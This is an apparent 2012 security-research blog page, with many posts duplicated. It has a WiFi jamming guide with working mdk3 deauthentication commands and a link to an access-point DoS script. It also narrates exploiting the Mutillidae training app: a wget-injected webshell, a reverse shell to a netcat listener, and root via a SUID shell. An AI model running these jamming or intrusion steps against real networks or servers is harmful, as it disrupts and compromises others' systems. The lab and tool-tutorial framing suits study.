So, we have written an article about PHP Command Injection (Applies to other platforms too, we just covered PHP).
Read it here! PHP Command Injection - Insecurety Research
More to come...
~Insecurety Research Team.
Thursday 15 March 2012
Wednesday 14 March 2012
[802.11] Wireless Jamming
Ok. Infodox BRIEFLY touched upon 802.11 jamming in his talk at CampusCon (their site seems to be down at the moment).
For those interested, the talk can be downloaded here: Insecurety Research
Anyways, onward to "The Good Stuff". I (x41) am simply posting the parts he wrote so far, and when he comes back he says he will finish the job.
Wireless Jamming. Sometimes one wants to disable all 802.11 stuff within range (i.e. WiFi) for some reason (perhaps deauth everyone so a KARMA style attack will work better?) and often this can be a bit of a challenge.
Challenge accepted.
First off, let's get to grips with some software called "mdk3".
MDK3 is a 802.11 flooding tool, and comes preinstalled on BackTrack and several other Pentest distros.
However, let's assume you are running a standard Ubuntu box and have not got it installed... So start by installing aircrack.
apt-get install aircrack-ng (ubuntu)
yum install aircrack-ng (fedora)
...Or, compile from sauce...
http://www.aircrack-ng.org/
Now. MDK3.
http://homepages.tu-darmstadt.de/~p_larbig/wlan/
Grab the source from here, untar, ./configure, make && make install (as root).
Then to run (as root):
PUT CARD INTO MONITOR MODE BEFORE CONTINUING!
sudo airmon-ng start wlan0 (where wlan0 is your wifi card)
mdk3 (arguements)
Some samples... (assumes mon0 is your monitor mode interface)
1. mdk3 mon0 x 1 -c (target client MAC) -t (target AP MAC)
This one simply deauths the victim client. Good for targetted jamming.
2. mdk3 mon0 d -b /root/blacklist
assuming you have a list of MAC addresses you DONT wish to have online, you put em in a list and blacklist em. This jams them.
3. mdk3 mon0" d -w (and the path to your whitelist file)
This kills everyones WiFi EXCEPT the devices in the whitelist.
Now. On to more fun things... Killing AP's.
Introducing "ap fucker".
AP Fucker is a python script that automates these DoS attacks. My preferred mode is "Destruction Mode". For obvious reasons.
Grab AP fucker here.. ApFucker - Pastebin
Running this is very simple. Just sudo bash (must be root), start the interface in monitor mode, and run it.
More to come - this was just an introduction!
For those interested, the talk can be downloaded here: Insecurety Research
Anyways, onward to "The Good Stuff". I (x41) am simply posting the parts he wrote so far, and when he comes back he says he will finish the job.
Wireless Jamming. Sometimes one wants to disable all 802.11 stuff within range (i.e. WiFi) for some reason (perhaps deauth everyone so a KARMA style attack will work better?) and often this can be a bit of a challenge.
Challenge accepted.
First off, let's get to grips with some software called "mdk3".
MDK3 is a 802.11 flooding tool, and comes preinstalled on BackTrack and several other Pentest distros.
However, let's assume you are running a standard Ubuntu box and have not got it installed... So start by installing aircrack.
apt-get install aircrack-ng (ubuntu)
yum install aircrack-ng (fedora)
...Or, compile from sauce...
http://www.aircrack-ng.org/
Now. MDK3.
http://homepages.tu-darmstadt.de/~p_larbig/wlan/
Grab the source from here, untar, ./configure, make && make install (as root).
Then to run (as root):
PUT CARD INTO MONITOR MODE BEFORE CONTINUING!
sudo airmon-ng start wlan0 (where wlan0 is your wifi card)
mdk3 (arguements)
Some samples... (assumes mon0 is your monitor mode interface)
1. mdk3 mon0 x 1 -c (target client MAC) -t (target AP MAC)
This one simply deauths the victim client. Good for targetted jamming.
2. mdk3 mon0 d -b /root/blacklist
assuming you have a list of MAC addresses you DONT wish to have online, you put em in a list and blacklist em. This jams them.
3. mdk3 mon0" d -w (and the path to your whitelist file)
This kills everyones WiFi EXCEPT the devices in the whitelist.
Now. On to more fun things... Killing AP's.
Introducing "ap fucker".
AP Fucker is a python script that automates these DoS attacks. My preferred mode is "Destruction Mode". For obvious reasons.
Grab AP fucker here.. ApFucker - Pastebin
Running this is very simple. Just sudo bash (must be root), start the interface in monitor mode, and run it.
More to come - this was just an introduction!
Monday 12 March 2012
Infodox is AFK (x41)
x41 here, minding Infodox's accounts for him.
He is AFK. Indefinately. He will eventually come back. We hope...
The loss of such an enthusiastic researcher would be a blow to us at Insecurety Research, as he was the guy who got it going and came up with all kinds of crazy ideas - from mixing SQLi/LFI to the possibility of distributed vuln scanning via XSS.
If he goes, those ideas may well vanish with him as they are located in his "internal hard drive".
Anyways, seein as I have his blog and admin on the site and we have such a lovely audience, I may as well start posting things for him, etc.
He is AFK. Indefinately. He will eventually come back. We hope...
The loss of such an enthusiastic researcher would be a blow to us at Insecurety Research, as he was the guy who got it going and came up with all kinds of crazy ideas - from mixing SQLi/LFI to the possibility of distributed vuln scanning via XSS.
If he goes, those ideas may well vanish with him as they are located in his "internal hard drive".
Anyways, seein as I have his blog and admin on the site and we have such a lovely audience, I may as well start posting things for him, etc.
Wednesday 7 March 2012
[Article] Reverse shells...
Ok. So I wrote a short article yesterday showing off a few reverse shell tricks and demoing them on a vulnerable web app using a Command Injection vulnerability.
Some people were asking "why it so basic?" and here is why: The idea of the article is not to provide script kids/blackhats with new info - it is well known - but to demonstrate how one can go from a small PHP bug to a full blown reverse shell.
I will be working up SNORT IDS Signatures for them all based on how they throw a shell back, just have to get some nice .pcaps of it first. I plan to also find a way to "signature" the IDS evading shellcode I wrote - and so kind of have an "arms race" with myself...
Article on Insecurety.net
Some people were asking "why it so basic?" and here is why: The idea of the article is not to provide script kids/blackhats with new info - it is well known - but to demonstrate how one can go from a small PHP bug to a full blown reverse shell.
I will be working up SNORT IDS Signatures for them all based on how they throw a shell back, just have to get some nice .pcaps of it first. I plan to also find a way to "signature" the IDS evading shellcode I wrote - and so kind of have an "arms race" with myself...
Article on Insecurety.net
Monday 5 March 2012
For Fuck Sake
So. Due to our bitcoin app it seems we have been blacklisted, our .co.cc domain has been nullrouted.
I have lodged a complaint about this, and suspect someone has been spamming their abuse dept in order to get my attention. I have a suspect, however I will do NOTHING about it until I get some proof.
For now we will be using THIS domain: theinfodox.blogspot.com
Until the situation resolves we will be working to let people know...
I have lodged a complaint about this, and suspect someone has been spamming their abuse dept in order to get my attention. I have a suspect, however I will do NOTHING about it until I get some proof.
For now we will be using THIS domain: theinfodox.blogspot.com
Until the situation resolves we will be working to let people know...
Friday 2 March 2012
OWASP Galway Begins!
Ok, this is a very short post as I am a tad busy, but, as of today (Friday, March Second, 2012), Galway (Ireland) has its own OWASP chapter setup by infodox!
Meetings are being prepared, as are workshops, talks and such, so watch this space for updates!
I will post links to its wiki/blog/etc later on today :)
check out OWASP stuff at OWASP.ORG
Meetings are being prepared, as are workshops, talks and such, so watch this space for updates!
I will post links to its wiki/blog/etc later on today :)
check out OWASP stuff at OWASP.ORG
Quick note regarding my last demo
Ok, my last demo the reason the LFI-RCE failed was very simple: I messed up the Apache/PHP config in LAMPP while fuzzing earlier and forgot to reset it :/
Don't worry, my next demo will be on leveraging SQLi vulns in order to gain RCE, and I have to setup a better testbox anyway.
I will be showing the manual method + SQLMap methods of doing it all, and might even get a chance to video it!
Don't worry, my next demo will be on leveraging SQLi vulns in order to gain RCE, and I have to setup a better testbox anyway.
I will be showing the manual method + SQLMap methods of doing it all, and might even get a chance to video it!
WebApp Haxploitation with Weevely, Introducing InterSect.
Ok. This is a fairly pointless demo I made to demonstrate how a web-application bug (in this case LFI + Command Injection) can be leveraged to gain complete root access over a server. I simply took a bunch of screencaps during the demo I made to show a friend "Why web app bugs are dangerous".
So. Here goes!
The web app we used here was THIS: Mutillidae - IronGeek
Part One: The Buggy Page.
This shows the buggy applications vulnerable page. It is a simple "Do a DNS lookup" page that just by looking at we can discern certainly has a Local File Inclusion vulnerability, and more than likely a Command Injection vulnerability.
Part Two: Lets Look for LFI
So. I knew there was LFI, and decided I would let fimap check for me, to see could I pull off any LFI-RCE stuff.
So. Now we know Fimap no canhaz RCE on the site, however there IS LFI. I want RCE, so I move swiftly along to the second vulnerability - Command injection.
Part Three: Command Injection
I decided to inject a Weevely Webshell into the app, so I put it up on my webserver and used wget to "inject" it.
Here is a screencap...
Ok. Shell seems injected, so we move on and try connect to it using the Weevely Client.
Part Four: There are Weevils In Your WWWROOT
Connecting to Weevely's PHP backdoor with the client. This is too easy...
So, lets see what it looks like in there...
SO! Got remote code execution and a "shell" like session. Let's see does Weevely's reverse shell work for us and try become uid=0 :D
Part Five: Netcat Sais Meow
First off, we start Weevely's reverse shell plugin and tell it to phone home to us... We will be listening for it...
Ok. Now for the listener end of things...
w00t! We haz a shell :D
... Moving Swiftly along...
We decide to check kernel version and randomly see what commands work. I decided to lsusb for some arbitrary reason. Don't ask.
Ok. So we move on to escalating/exploring!
Part Six: Enter InterSect.
So I decide to test out InterSect, a wonderful post-exploitation tool developed by ohdae of BindShell Labs.
Here is a screencap of wgetting Intersect to the target box...
Aaaaand now to RUN Intersect ......
Ok. Intersect does not want to run as NON root, so it tells me how to get root on the box... Seeing as I like root... lets go get some!
Part Seven: We Are uid=0, + Harvest Some Infodox
So. I simply run a hypothetical root-exploit I had left in /tmp and getr00t! (It was actually a SUID shell I dropped earlier, as my kernel doesnt like localroots and panics!)
So. Got root. What next? Lets try see does InterSect want to run this time...
It Works! Sadly my battery promptly /quit a moment later but I think you get the idea of what you can do!
LINKS:
BindShell Labs
Intersect 2 - GitHub
Weevely - GoogleCode
Fimap - GoogleCode
And Finally
Insecurety Research
So. Here goes!
The web app we used here was THIS: Mutillidae - IronGeek
Part One: The Buggy Page.
This shows the buggy applications vulnerable page. It is a simple "Do a DNS lookup" page that just by looking at we can discern certainly has a Local File Inclusion vulnerability, and more than likely a Command Injection vulnerability.
Part Two: Lets Look for LFI
So. I knew there was LFI, and decided I would let fimap check for me, to see could I pull off any LFI-RCE stuff.
So. Now we know Fimap no canhaz RCE on the site, however there IS LFI. I want RCE, so I move swiftly along to the second vulnerability - Command injection.
Part Three: Command Injection
I decided to inject a Weevely Webshell into the app, so I put it up on my webserver and used wget to "inject" it.
Here is a screencap...
Ok. Shell seems injected, so we move on and try connect to it using the Weevely Client.
Part Four: There are Weevils In Your WWWROOT
Connecting to Weevely's PHP backdoor with the client. This is too easy...
So, lets see what it looks like in there...
SO! Got remote code execution and a "shell" like session. Let's see does Weevely's reverse shell work for us and try become uid=0 :D
Part Five: Netcat Sais Meow
First off, we start Weevely's reverse shell plugin and tell it to phone home to us... We will be listening for it...
Ok. Now for the listener end of things...
w00t! We haz a shell :D
... Moving Swiftly along...
We decide to check kernel version and randomly see what commands work. I decided to lsusb for some arbitrary reason. Don't ask.
Ok. So we move on to escalating/exploring!
Part Six: Enter InterSect.
So I decide to test out InterSect, a wonderful post-exploitation tool developed by ohdae of BindShell Labs.
Here is a screencap of wgetting Intersect to the target box...
Aaaaand now to RUN Intersect ......
Ok. Intersect does not want to run as NON root, so it tells me how to get root on the box... Seeing as I like root... lets go get some!
Part Seven: We Are uid=0, + Harvest Some Infodox
So. I simply run a hypothetical root-exploit I had left in /tmp and getr00t! (It was actually a SUID shell I dropped earlier, as my kernel doesnt like localroots and panics!)
So. Got root. What next? Lets try see does InterSect want to run this time...
It Works! Sadly my battery promptly /quit a moment later but I think you get the idea of what you can do!
LINKS:
BindShell Labs
Intersect 2 - GitHub
Weevely - GoogleCode
Fimap - GoogleCode
And Finally
Insecurety Research
Thursday 1 March 2012
Installing Nemesis on Ubuntu/BackTrack
Ok. Simple Post to explain how to go about installing Nemesis on Ubuntu/BackTrack.
What is nemesis?
Nemesis is a packet crafting/sending utility. It, much like hping3, allows you to craft and send packets of a few different protocols. I mainly use it for crafting/sending ARP packets for ARP poisoning, and my tool "arptoxin" uses it.
This post is also available HERE
Step One: Sudo Bash
i.e. you must be root.
Step Two: Install Dependancies
apt-get install libdnet-dev
apt-get install libpcap-dev
Step Three: Install libnet
cd /usr
mkdir nembuild
cd nembuild
wget http://ips-builder.googlecode.com/files/libnet-1.0.2a.tar.gz
tar -xf libnet-1.0.2a.tar.gz
cd Libnet-1.0.2a
./configure
make && make install
Step Four: Install Nemesis
cd /usr/nembuild (if not still there!)
wget http://heanet.dl.sourceforge.net/project/nemesis/nemesis/1.4/nemesis-1.4.tar.gz
tar -xf nemesis-1.4.tar.gz
cd nemesis-1.4
./configure --with-libnet-includes=/usr/nembuild/Libnet-1.0.2a/include --with-libnet-libraries=/usr/nembuild/Libnet-1.0.2a/lib
make && make install
Done! Nemesis SHOULD look like this...
What is nemesis?
Nemesis is a packet crafting/sending utility. It, much like hping3, allows you to craft and send packets of a few different protocols. I mainly use it for crafting/sending ARP packets for ARP poisoning, and my tool "arptoxin" uses it.
This post is also available HERE
Step One: Sudo Bash
i.e. you must be root.
Step Two: Install Dependancies
apt-get install libdnet-dev
apt-get install libpcap-dev
Step Three: Install libnet
cd /usr
mkdir nembuild
cd nembuild
wget http://ips-builder.googlecode.com/files/libnet-1.0.2a.tar.gz
tar -xf libnet-1.0.2a.tar.gz
cd Libnet-1.0.2a
./configure
make && make install
Step Four: Install Nemesis
cd /usr/nembuild (if not still there!)
wget http://heanet.dl.sourceforge.net/project/nemesis/nemesis/1.4/nemesis-1.4.tar.gz
tar -xf nemesis-1.4.tar.gz
cd nemesis-1.4
./configure --with-libnet-includes=/usr/nembuild/Libnet-1.0.2a/include --with-libnet-libraries=/usr/nembuild/Libnet-1.0.2a/lib
make && make install
Done! Nemesis SHOULD look like this...
Subscribe to:
Posts (Atom)